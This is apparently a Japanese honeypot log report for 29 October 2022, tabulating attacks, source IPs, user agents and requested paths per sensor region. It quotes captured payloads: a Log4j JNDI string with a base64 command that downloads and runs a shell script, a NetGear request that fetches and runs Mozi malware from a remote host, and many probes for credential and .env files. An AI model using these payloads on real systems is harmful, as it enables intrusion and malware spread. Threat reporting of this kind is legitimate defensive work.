2022/10/29 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2022/10/29分です。

特徴

共通

GPONルータの脆弱性を狙うアクセス
/.envへのスキャン行為

Location:JP

Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
CensysInspectによるスキャン行為
zgrabによるスキャン行為
.jsへのスキャン行為
/.awsへのスキャン行為
/.gitへのスキャン行為
WordPressへのスキャン行為
112.124.42.80に関する不正通信

を確認しました。

Location:US

PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為
curlによるスキャン行為
zgrabによるスキャン行為

を確認しました。

Location:UK

Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
F5 BIG-IP製品の脆弱性(CVE-2022-1388)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
zgrabによるスキャン行為
Apache Solrへのスキャン行為
WordPress Pluginへのスキャン行為
phpMyAdminへのスキャン行為

を確認しました。

Location:SG

Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為
Apache Solrへのスキャン行為
WordPress Pluginへのスキャン行為
phpMyAdminへのスキャン行為
112.124.42.80に関する不正通信

を確認しました。

他

アクセス数推移

JP：総アクセス数：151 (前日比：69)
US：総アクセス数：132 (前日比：36)
UK：総アクセス数：329 (前日比：249)
SG：総アクセス数：296 (前日比：-71)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	3.85.202.203	United States
87	18.228.153.187	United States
2	35.242.177.22	United States
1	37.44.238.141	France
1	45.33.80.243	United States
1	45.79.128.205	United States
1	45.79.181.223	United States
1	60.191.125.35	China
7	95.214.235.205	Ukraine
2	109.237.97.201	Russia
1	117.216.24.187	India
1	128.1.248.42	United States
4	128.199.99.193	United Kingdom
10	135.125.244.48	France
8	135.125.246.110	France
3	137.184.162.18	United States
1	161.35.213.88	United States
1	167.94.145.58	United States
1	172.104.11.34	United States
1	172.105.77.209	United States
1	172.105.128.11	United States
1	179.43.175.204	Panama
2	183.136.225.35	China
4	185.254.196.115	Ukraine
1	188.165.87.103	France
2	192.155.90.118	United States
1	192.155.90.220	United States
1	192.241.216.139	United States
1	198.199.73.83	United States
1	198.235.24.30	United States
1	205.210.31.138	United States

UserAgent一覧

件数	UserAgent
22	`-`
1	`Mozilla/5.0 (Linux U; en-US) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) Version/4.0 Kindle/3.0 (screen 600x800; rotate)`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36`
87	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
31	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 zgrab/0.x`
1	`t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//198[.]199[.]73[.]83:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzE5OS4xOTUuMjUzLjE4Ny9ha3R1YWxpc2llcmVuLnNoIC1vIGFrdHVhbGlzaWVyZW4uc2g7IHdnZXQgaHR0cDovLzE5OS4xOTUuMjUzLjE4Ny9ha3R1YWxpc2llcmVuLnNoOyBjaG1vZCA3NzcgYWt0dWFsaXNpZXJlbi5zaDsgc2ggYWt0dWFsaXNpZXJlbi5zaDsgcm0gLXJmIGFrdHVhbGlzaWVyZW4uc2g7IHJtIC1yZiBha3R1YWxpc2llcmVuLnNoLjE=}')`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`\x16\x03\x01\x01C\x01`
17		`\x16\x03\x01`
1		`\xab\xe4\xd0\xe8&\x18\x8d\r40\x9a\xafJG\x9f\xd4\xf3/\xff\xea\xd3\v\xbd\xeai\x87\|A\xdf\v\xbd\xea\xd2\x0f\xff\xea\xd3\v\xbe\xe2\xd3\v\xbd\xea\xd3\v\xbd\xeay\v\xbd\xea\xd3\v\x96\xc1\xd3\v\xbd\xea\xfb\v\xbd\xea\xd3\v\xbd\xea\xd3\v\xbd\xea\xd3\v\xbd\xea\xd2\n`
1	GET	`/.aws/credentials`	HTTP/1.1
1	GET	`/.config/gatsby/config.json`	HTTP/1.1
1	GET	`/.cordova/config.json`	HTTP/1.1
1	GET	`/.deployment-config.json`	HTTP/1.1
1	GET	`/.docker/.env`	HTTP/1.1
1	GET	`/.docker/config.json`	HTTP/1.1
1	GET	`/.docker/daemon.json`	HTTP/1.1
1	GET	`/.docker/laravel/app/.env`	HTTP/1.1
1	GET	`/.env.backup`	HTTP/1.1
1	GET	`/.env.bak`	HTTP/1.1
1	GET	`/.env.dev`	HTTP/1.1
1	GET	`/.env.development.local`	HTTP/1.1
1	GET	`/.env.dist`	HTTP/1.1
1	GET	`/.env.docker.dev`	HTTP/1.1
1	GET	`/.env.local`	HTTP/1.1
1	GET	`/.env.php`	HTTP/1.1
1	GET	`/.env.prod`	HTTP/1.1
1	GET	`/.env.production.local`	HTTP/1.1
1	GET	`/.env.sample.php`	HTTP/1.1
1	GET	`/.env.save`	HTTP/1.1
1	GET	`/.env.stage`	HTTP/1.1
1	GET	`/.env.test.localapi/.env`	HTTP/1.1
1	GET	`/.env.test`	HTTP/1.1
32	GET	`/.env`	HTTP/1.1
1	GET	`/.environment`	HTTP/1.1
1	GET	`/.envrc`	HTTP/1.1
1	GET	`/.envs`	HTTP/1.1
1	GET	`/.env~`	HTTP/1.1
1	GET	`/.gitlab-ci/.env`	HTTP/1.1
1	GET	`/.jupyter/jupyter_notebook_config.json`	HTTP/1.1
1	GET	`/.lanproxy/config.json`	HTTP/1.1
1	GET	`/.msmtprc`	HTTP/1.1
1	GET	`/.s3cfg`	HTTP/1.1
1	GET	`/.vscode/.env`	HTTP/1.1
1	GET	`/0bef`	HTTP/1.0
1	GET	`/?id=`	HTTP/1.1
1	GET	`/ReportServer`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/_wpeprivate/config.json`	HTTP/1.1
1	GET	`/admin/.env`	HTTP/1.1
1	GET	`/admin/`	HTTP/1.1
1	GET	`/api/settings/values`	HTTP/1.1
1	GET	`/app/config.yml`	HTTP/1.1
1	GET	`/app/config/parameters.yml`	HTTP/1.1
1	GET	`/asdf.php`	HTTP/1.1
1	GET	`/beta/.env`	HTTP/1.1
1	GET	`/config.env`	HTTP/1.1
1	GET	`/config.js`	HTTP/1.1
1	GET	`/config.json`	HTTP/1.1
1	GET	`/config/config.js`	HTTP/1.1
1	GET	`/config/config.json`	HTTP/1.1
1	GET	`/config/secrets.yml`	HTTP/1.1
1	GET	`/console/base/config.json`	HTTP/1.1
1	GET	`/console/payments/config.json`	HTTP/1.1
1	GET	`/dashboard/phpinfo.php`	HTTP/1.1
1	GET	`/database.yml`	HTTP/1.1
1	GET	`/debug/default/view?panel=config`	HTTP/1.1
1	GET	`/env.backup`	HTTP/1.1
1	GET	`/env.config.js`	HTTP/1.1
1	GET	`/env.js`	HTTP/1.1
4	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/frontend_dev.php/$`	HTTP/1.1
1	GET	`/i.php`	HTTP/1.1
1	GET	`/info.json`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
1	GET	`/infophp.php`	HTTP/1.1
1	GET	`/infos.php`	HTTP/1.1
1	GET	`/js/config.js`	HTTP/1.1
1	GET	`/js/envConfig.js`	HTTP/1.1
1	GET	`/kyc/.env`	HTTP/1.1
1	GET	`/laravel/.env`	HTTP/1.1
1	GET	`/laravel/core/.env`	HTTP/1.1
1	GET	`/linusadmin-phpinfo.php`	HTTP/1.1
1	GET	`/mailer/.env`	HTTP/1.1
1	GET	`/old_phpinfo.php`	HTTP/1.1
1	GET	`/php-info.php`	HTTP/1.1
1	GET	`/php.ini`	HTTP/1.1
1	GET	`/php.php`	HTTP/1.1
1	GET	`/phpinfo.php`	HTTP/1.1
1	GET	`/phpinfo`	HTTP/1.1
1	GET	`/phpversion.php`	HTTP/1.1
1	GET	`/pinfo.php`	HTTP/1.1
1	GET	`/prod/.env`	HTTP/1.1
1	GET	`/public/.env`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/secrets.yml`	HTTP/1.1
1	GET	`/server/config.json`	HTTP/1.1
1	GET	`/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//117[.]216[.]24[.]187:34950/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1`	HTTP/1.0
1	GET	`/temp.php`	HTTP/1.1
1	GET	`/test.php`	HTTP/1.1
1	GET	`/time.php`	HTTP/1.1
1	GET	`/twitter/.env`	HTTP/1.1
1	GET	`/wp-config.php-backup`	HTTP/1.1
1	GET	`/wp-config.php.bak`	HTTP/1.1
1	GET	`/wp-config.php.old`	HTTP/1.1
1	HEAD	`http[:]//112[.]124[.]42[.]80:63435/`	HTTP/1.1
1	OPTIONS	`/`	HTTP/1.0
1	POST	`/boaform/admin/formLogin`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
2	20.185.227.59	United States
2	34.65.120.153	United States
1	37.44.238.141	France
1	37.44.238.183	France
23	45.33.65.249	United States
2	45.33.80.243	United States
2	45.79.172.21	United States
2	45.79.181.104	United States
1	45.79.181.179	United States
2	45.79.181.223	United States
3	45.227.254.54	Belize
4	46.101.20.181	United States
26	54.37.79.75	France
1	64.62.197.133	United States
3	68.183.3.132	United States
1	79.124.62.106	Bulgaria
4	89.248.167.131	United Kingdom
2	109.237.97.201	Russia
3	138.68.73.136	United States
4	152.89.196.211	Russia
1	159.65.252.153	United States
2	162.142.125.212	United States
3	164.92.152.123	United States
3	167.99.149.231	United States
1	172.104.11.4	United States
1	172.104.11.34	United States
1	172.104.11.46	United States
1	172.104.11.51	United States
2	172.105.77.209	United States
1	172.105.89.161	United States
1	174.138.188.242	United States
1	179.43.175.204	Panama
2	183.136.225.35	China
10	185.254.196.223	Ukraine
1	192.155.90.118	United States
1	192.155.90.220	United States
1	192.241.207.196	United States
1	192.241.217.180	United States
1	192.241.220.31	United States
1	193.118.53.194	United States
1	194.180.48.125	Bulgaria
3	198.211.110.118	United States
1	198.235.24.142	United States
1	205.210.31.141	United States
1	209.141.36.231	United States

UserAgent一覧

件数	UserAgent
69	`-`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
1	`Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36`
39	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
2	`Mozilla/5.0 zgrab/0.x`
1	`SonyEricssonT650i/R7AA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1`
6	`curl/7.54.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`-`
1		`MGLNDD_34.68.118.83_80\n`
4		`\x03`
1		`\x16\x03\x01\x01C\x01`
17		`\x16\x03\x01\x02`
34		`\x16\x03\x01`
1		`\x8ee\xe7=$\x867\x800\x92\x80-g\x10\xbe\xf7hIQ!Hm\x13!\xf2\xe1\xd2\x8aDm\x13!IiQ!Hm\x10)Hm\x13!Hm\x13!\xe2m\x13!Hm8\n`
1		`\x9a\xf46\xe3\x05\r\xbf>q<3%\x05\xc6\xeb\xc8*\x8a\xc0Y\n`
1		`\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159`	X\xd4>\x12\x98\xc4<\xe0\x13\xcf
1		`\xfd\xaa\xc9l\n`
39	GET	`/.env`	HTTP/1.1
1	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`/0bef`	HTTP/1.0
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/__Additional`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
1	GET	`/admin/`	HTTP/1.1
1	GET	`/api/settings/values`	HTTP/1.1
1	GET	`/docs/cplugError.html/`	HTTP/1.1
1	GET	`/explore`	HTTP/1.1
6	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/pools/default/buckets`	HTTP/1.1
1	GET	`/pools`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
3	GET	`/robots.txt`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	HEAD	`/`	HTTP/1.1
1	HEAD	`/robots.txt`	HTTP/1.0
1	OPTIONS	`/`	HTTP/1.0
2	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
8	3.234.221.228	United States
1	4.1.229.86	United States
2	34.88.101.51	United States
9	35.178.81.27	United States
1	37.44.238.141	France
1	45.79.128.205	United States
1	45.79.172.21	United States
1	45.79.181.104	United States
3	45.227.254.54	Belize
2	66.175.213.4	United States
1	79.124.62.106	Bulgaria
126	98.117.178.23	United States
2	109.237.97.201	Russia
126	125.227.119.200	Taiwan
1	128.1.248.26	United States
5	152.89.196.211	Russia
4	157.245.135.244	United States
3	165.227.34.18	United States
3	165.227.152.235	United States
3	172.104.11.4	United States
1	172.104.11.34	United States
1	172.105.77.209	United States
1	172.105.128.11	United States
1	172.105.128.12	United States
1	173.249.52.163	Germany
1	174.138.188.242	United States
1	179.60.149.55	Panama
1	183.136.225.35	China
8	185.254.196.223	Ukraine
1	192.155.90.220	United States
1	192.241.215.99	United States
1	194.55.186.126	Bulgaria
1	198.199.73.83	United States
1	198.235.24.143	United States
1	198.235.24.148	United States
4	206.189.189.7	United States

UserAgent一覧

件数	UserAgent
4	`'Cloud mapping experiment. Contact research@pdrlabs.net'`
47	`-`
4	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36`
252	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36`
5	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
10	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 zgrab/0.x`
1	`t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//198[.]199[.]73[.]83:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzE5OS4xOTUuMjUzLjE4Ny9ha3R1YWxpc2llcmVuLnNoIC1vIGFrdHVhbGlzaWVyZW4uc2g7IHdnZXQgaHR0cDovLzE5OS4xOTUuMjUzLjE4Ny9ha3R1YWxpc2llcmVuLnNoOyBjaG1vZCA3NzcgYWt0dWFsaXNpZXJlbi5zaDsgc2ggYWt0dWFsaXNpZXJlbi5zaDsgcm0gLXJmIGFrdHVhbGlzaWVyZW4uc2g7IHJtIC1yZiBha3R1YWxpc2llcmVuLnNoLjE=}')`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`=\n`
1		`U\xcc\xdf\x98`	\n
5		`\x03`
1		`\x16\x03\x01\x01C\x01`
36		`\x16\x03\x01`
10	GET	`/.env`	HTTP/1.1
1	GET	`/0bef`	HTTP/1.0
6	GET	`/1phpmyadmin/index.php?lang=en`	HTTP/1.1
4	GET	`/2phpmyadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/99vt`	HTTP/1.1
1	GET	`/99vu`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?id=`	HTTP/1.1
4	GET	`/MyAdmin/index.php?lang=en`	HTTP/1.1
1	GET	`/PMA/index.php?lang=en`	HTTP/1.1
2	GET	`/_phpmyadmin/index.php?lang=en`	HTTP/1.1
2	GET	`/_phpmyadmin_/index.php?lang=en`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/admin/`	HTTP/1.1
1	GET	`/admin/db/index.php?lang=en`	HTTP/1.1
1	GET	`/admin/index.html`	HTTP/1.1
3	GET	`/admin/index.php?lang=en`	HTTP/1.1
3	GET	`/admin/phpmyadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/admin/pma/index.php?lang=en`	HTTP/1.1
3	GET	`/admin/sqladmin/index.php?lang=en`	HTTP/1.1
1	GET	`/admin/sysadmin/index.php?lang=en`	HTTP/1.1
2	GET	`/admin/web/index.php?lang=en`	HTTP/1.1
4	GET	`/administrator/PMA/index.php?lang=en`	HTTP/1.1
3	GET	`/administrator/admin/index.php?lang=en`	HTTP/1.1
1	GET	`/administrator/db/index.php?lang=en`	HTTP/1.1
3	GET	`/administrator/phpMyAdmin/index.php?lang=en`	HTTP/1.1
2	GET	`/administrator/phpmyadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/administrator/pma/index.php?lang=en`	HTTP/1.1
1	GET	`/administrator/web/index.php?lang=en`	HTTP/1.1
2	GET	`/database/index.php?lang=en`	HTTP/1.1
2	GET	`/db/db-admin/index.php?lang=en`	HTTP/1.1
1	GET	`/db/dbadmin/index.php?lang=en`	HTTP/1.1
3	GET	`/db/dbweb/index.php?lang=en`	HTTP/1.1
4	GET	`/db/myadmin/index.php?lang=en`	HTTP/1.1
2	GET	`/db/phpMyAdmin-4/index.php?lang=en`	HTTP/1.1
2	GET	`/db/phpMyAdmin-5/index.php?lang=en`	HTTP/1.1
5	GET	`/db/phpMyAdmin/index.php?lang=en`	HTTP/1.1
2	GET	`/db/phpMyAdmin3/index.php?lang=en`	HTTP/1.1
1	GET	`/db/phpmyadmin/index.php?lang=en`	HTTP/1.1
3	GET	`/db/phpmyadmin5/index.php?lang=en`	HTTP/1.1
3	GET	`/db/webadmin/index.php?lang=en`	HTTP/1.1
4	GET	`/db/webdb/index.php?lang=en`	HTTP/1.1
4	GET	`/dbadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/explore`	HTTP/1.1
2	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/index.html`	HTTP/1.1
4	GET	`/index.php?lang=en`	HTTP/1.1
1	GET	`/manage/account/login`	HTTP/1.1
3	GET	`/myadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/mysql-admin/index.php?lang=en`	HTTP/1.1
1	GET	`/mysql/admin/index.php?lang=en`	HTTP/1.1
4	GET	`/mysql/db/index.php?lang=en`	HTTP/1.1
1	GET	`/mysql/index.php?lang=en`	HTTP/1.1
2	GET	`/mysql/mysqlmanager/index.php?lang=en`	HTTP/1.1
3	GET	`/mysql/pMA/index.php?lang=en`	HTTP/1.1
2	GET	`/mysql/pma/index.php?lang=en`	HTTP/1.1
2	GET	`/mysql/sqlmanager/index.php?lang=en`	HTTP/1.1
1	GET	`/mysqlmanager/index.php?lang=en`	HTTP/1.1
3	GET	`/php-my-admin/index.php?lang=en`	HTTP/1.1
2	GET	`/php-myadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin-3/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin-4.9.10-all-languages/index.php?lang=en`	HTTP/1.1
3	GET	`/phpMyAdmin-4.9.7/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin-4/index.php?lang=en`	HTTP/1.1
3	GET	`/phpMyAdmin-5.1.1/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin-5.1.2/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin-5.2.0/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin-5.3.0-all-languages/index.php?lang=en`	HTTP/1.1
3	GET	`/phpMyAdmin-5.3.0/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin-5/index.php?lang=en`	HTTP/1.1
4	GET	`/phpMyAdmin-latest-all-languages/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin-latest-english/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin/index.php?lang=en`	HTTP/1.1
6	GET	`/phpMyAdmin1/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin2/index.php?lang=en`	HTTP/1.1
4	GET	`/phpMyAdmin3/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin5.1/index.php?lang=en`	HTTP/1.1
3	GET	`/phpMyAdmin5.2/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin5/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmy-admin/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmy/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyAdmin/index.php?lang=en`	HTTP/1.1
3	GET	`/phpmyadmin/index.php?lang=en`	HTTP/1.1
2	GET	`/phpmyadmin1/index.php?lang=en`	HTTP/1.1
2	GET	`/phpmyadmin2/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2012/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2013/index.php?lang=en`	HTTP/1.1
2	GET	`/phpmyadmin2015/index.php?lang=en`	HTTP/1.1
4	GET	`/phpmyadmin2017/index.php?lang=en`	HTTP/1.1
2	GET	`/phpmyadmin2018/index.php?lang=en`	HTTP/1.1
2	GET	`/phpmyadmin2019/index.php?lang=en`	HTTP/1.1
3	GET	`/phpmyadmin2020/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2021/index.php?lang=en`	HTTP/1.1
3	GET	`/phpmyadmin2022/index.php?lang=en`	HTTP/1.1
4	GET	`/phpmyadmin3/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin4/index.php?lang=en`	HTTP/1.1
3	GET	`/phpmyadmin5/index.php?lang=en`	HTTP/1.1
2	GET	`/phpmyadmin_/index.php?lang=en`	HTTP/1.1
3	GET	`/phppma/index.php?lang=en`	HTTP/1.1
2	GET	`/pma/index.php?lang=en`	HTTP/1.1
2	GET	`/program/index.php?lang=en`	HTTP/1.1
2	GET	`/robots.txt`	HTTP/1.1
3	GET	`/shopdb/index.php?lang=en`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
2	GET	`/sql/myadmin/index.php?lang=en`	HTTP/1.1
2	GET	`/sql/php-myadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/phpMyAdmin/index.php?lang=en`	HTTP/1.1
3	GET	`/sql/phpmanager/index.php?lang=en`	HTTP/1.1
5	GET	`/sql/phpmy-admin/index.php?lang=en`	HTTP/1.1
2	GET	`/sql/phpmyadmin3/index.php?lang=en`	HTTP/1.1
3	GET	`/sql/phpmyadmin5/index.php?lang=en`	HTTP/1.1
5	GET	`/sql/sql-admin/index.php?lang=en`	HTTP/1.1
2	GET	`/sql/sqladmin/index.php?lang=en`	HTTP/1.1
6	GET	`/sql/sqlweb/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/webadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/webdb/index.php?lang=en`	HTTP/1.1
3	GET	`/sql/websql/index.php?lang=en`	HTTP/1.1
2	GET	`/sqlmanager/index.php?lang=en`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
3	GET	`/wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en`	HTTP/1.1
1	HEAD	`/robots.txt`	HTTP/1.0
1	OPTIONS	`/`	HTTP/1.0
1	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/mgmt/tm/util/bash`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
2	34.141.38.89	United States
1	35.216.130.245	United States
1	37.44.238.141	France
1	45.79.172.21	United States
1	45.79.181.94	United States
1	45.79.181.104	United States
1	45.79.181.179	United States
1	45.79.181.223	United States
3	45.227.254.54	Belize
16	51.79.29.48	Canada
4	54.37.79.75	France
1	59.93.29.229	India
1	60.191.125.35	China
1	61.147.15.65	China
1	66.175.213.4	United States
1	66.240.192.82	United States
1	79.110.62.92	Bulgaria
1	79.124.62.106	Bulgaria
1	92.255.85.183	Hong Kong
101	117.89.26.14	China
1	128.1.248.26	United States
5	152.89.196.211	Russia
3	157.245.100.193	United States
2	162.142.125.7	United States
1	167.99.114.201	United States
2	172.104.11.4	United States
2	172.104.11.34	United States
1	172.105.77.209	United States
1	172.105.89.161	United States
1	172.105.128.13	United States
1	174.138.188.242	United States
4	183.136.225.35	China
1	184.105.247.200	United States
1	192.155.90.220	United States
126	193.200.83.154	Poland
1	198.199.73.83	United States
1	198.235.24.19	United States
1	205.210.31.149	United States

UserAgent一覧

件数	UserAgent
31	`-`
1	`Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36`
101	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36`
126	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
